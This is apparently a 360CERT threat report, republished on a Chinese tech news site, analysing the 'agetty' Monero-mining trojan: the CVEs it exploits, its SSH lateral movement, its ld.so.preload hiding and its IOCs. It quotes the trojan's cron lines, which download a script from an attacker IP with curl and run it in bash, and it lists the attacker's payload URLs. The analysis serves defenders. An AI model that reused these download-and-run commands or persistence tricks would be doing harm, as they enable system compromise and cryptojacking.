挖矿木马 agetty 来袭
- 报告编号:B6-2021-121601
- 报告来源:360CERT
- 报告作者:360CERT
- 更新日期:2021-12-16
木马简述
近期 360 安全大脑监测到一款名为 agetty 的挖矿木马,利用 GitLab 远程命令执行漏洞(CVE-2021-22205)等进行攻击,入侵后通过 SSH 连接进行横向移动,同时添加恶意计划任务,并隐藏挖矿进程,最终投递 xmrig 挖矿程序进行牟利。
分析木马内容
agetty 的挖矿木马利用以下漏洞进行攻击:
序号 | 漏洞名称 | 漏洞编号 |
---|---|---|
1 | Atlassian Confluence远程代码执行漏洞 | CVE-2021-26084 |
2 | GitLab ExifTool远程命令执行漏洞 | CVE-2021-22205 |
3 | WebLogic远程代码执行漏洞 | CVE-2020-14882 |
成功利用后从http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh
下载恶意脚本1.sh并执行。
1.脚本首先清除各类竞品挖矿木马家族。
2.随后将定时下载执行1.sh恶意脚本写入计划任务。
3.同时在设备上查找 config.json 挖矿配置文件,将其中的用户名替换为 agetty 木马自己的钱包地址,以期将他人的挖矿收益据为己有。
4.根据系统位数分别下载木马文件保存至 /tmp/.gvfsd-metadata、/tmp/.seapplet 并执行。
agetty 挖矿木马还会在/.ssh/config、.bash_history、/.ssh/known_hosts 等文件中搜索 SSH 凭证进行横向移动。
同时将木马内嵌的恶意 so 文件释放到 /usr/local/lib/v.so,通过 /etc/ld.so.preload 的方式进行预加载。将定时任务
0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh \\n
写入到/etc/cron.d/root文件;
将定时任务
0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh;bash /tmp/1.sh\\n
写入到 /var/spool/cron/root、/var/spool/cron/crontabs/root 文件。
此外,/usr/local/lib/v.so 还 hook 了 fopen、fopen64、lstat、open、readdir、rmdir、unlink、unlinkat 等等函数,过滤掉其中包含的 .mate-terminal、ld.so.preload、v.so 信息,实现隐藏自身的目的。
根据 agetty 木马的钱包地址,我们还关联到另一样本 0978fcab87c342330b7d34e6b8709124,xmrig 矿机与 config.json 配置文件分别托管在:
https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/agetty https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/config.json
该钱包目前在不同矿池的算力和收益图分别如下:
关联分析
经过分析,agetty木马的恶意脚本1.sh,与友商曾经报告的MimuMiner木马的shell脚本在部分内容上具有较高的相似度。背后团伙可能存在一定关联。
左边为agetty木马的脚本内容,右边为MimuMiner脚本。
IOC
MD5:
MD5 描述 9f15f94ebcaa432b55f743509253add9 木马模块 43cbd69a5bbea0bf01abd54628a75d2b 木马模块 ab6faf8b842bd7daab61a9cb35dc9110 1.sh 6a3b0ecfded0a99ef78b35df2e61da9d 64.tar.gz 47cabcf25234fa9ee1659b6dfe939aed 86.tar.gz 0978fcab87c342330b7d34e6b8709124 木马模块 217c5e889c058c3ec7a261a654f39a0c agetty(XMRig 6.15.2) 0ac5c93ba9d7e1a1a35775aa639fdb08 config.json
矿池:
钱包地址:
87EjF5M4uFCSQ2bHngLNTPgGA31aNjYvQbHvWpDkJvkYA4Zja5PG9Tdbe2TXDfEhPkD9Erh6mRW1cffw5UEbdhSpCSy1sVC
时间线
2021-12-16 : 360 高级威胁研究分析中心发布分析报告
参考链接
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
极海半导体正式成为 RT-Thread 高级会员
日前,珠海极海半导体有限公司与知名物联网操作系统厂商睿赛德科技(RT-Thread)签署会员合作协议,正式成为 RT-Thread 高级会员。极海半导体将携手 RT-Thread 物联网操作系统共同打造物联网发展新生态,为工业、车载、消费电子等领域提供更加丰富、更具竞争力的芯片产品方案组合,优化产品应用开发体验。 极海半导体成立于2019年12月,是艾派克微电子旗下的全资子公司,前身为艾派克物联网芯片事业部,总部为纳思达股份(中国上市企业500强,股票代码002180)。主营业务涵盖国产32位工业级通用MCU、低功耗蓝牙SoC和工业物联网SoC-eSE安全主控芯片。极海致力于为消费电子、医疗设备、智能家居、工业控制、汽车电子以及智慧能源等领域提供更优质的芯片产品与服务。 RT-Thread 是一款小而美的物联网操作系统,集实时操作系统(RTOS)内核、中间件组件于一体的技术平台,具备组件完整丰富、高度可伸缩、简易开发、超低功耗、高安全特性,支持所有主流MCU架构和编译工具,并支持各类标准接口如POSIX、CMSIS、C++应用环境、Javascript执行环境等。经过15年的累积发展,...
- 下一篇
是的,我们又获奖了!
喜事连连!优麒麟在获得中国信息通信研究院颁发的“可信开源项目”评估证书之后,再获“优秀开源创新企业”、“2021 年度 OSCHINA 优秀技术团队”称号。 “优秀开源创新企业” “优秀开源创新企业”评选由中国开源云联盟组织开展,其目的是推动国内开源生态产业发展,从贡献者、项目、应用案例、企业四个维度综合评选得出。优麒麟是由麒麟软件有限公司主导开发的全球开源项目,通过投票、答辩、专家评审,最终荣获中国开源云联盟授予的“2021 优秀开源创新企业”称号。 “2021年度OSCHINA优秀技术团队” “2021 年度 OSCHINA 优秀技术团队”由 OSCHINA 开源技术社区评选颁发。在综合评估优麒麟社区运营活跃度、技术文章产出质量等多方面的维度后,为优麒麟颁发了“2021 年度 OSCHINA 优秀技术团队”奖项。 此番获奖不仅是优麒麟社区的荣誉,也是全体社区成员的共同荣誉,是大家共同努力的结果,促使优麒麟社区蓬勃发展。未来,优麒麟将在营造良好开源生态和技术发展方面持续努力,也期待越来越多的爱好者参与进来,为建设开源、贡献开源添砖加瓦! 优麒麟社区自 2013 年成立以来,已累计发...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
-
Docker使用Oracle官方镜像安装(12C,18C,19C)
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- CentOS8编译安装MySQL8.0.19
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- SpringBoot2配置默认Tomcat设置,开启更多高级功能
- MySQL8.0.19开启GTID主从同步CentOS8
- CentOS7,8上快速安装Gitea,搭建Git服务器
- Jdk安装(Linux,MacOS,Windows),包含三大操作系统的最全安装
- SpringBoot2编写第一个Controller,响应你的http请求并返回结果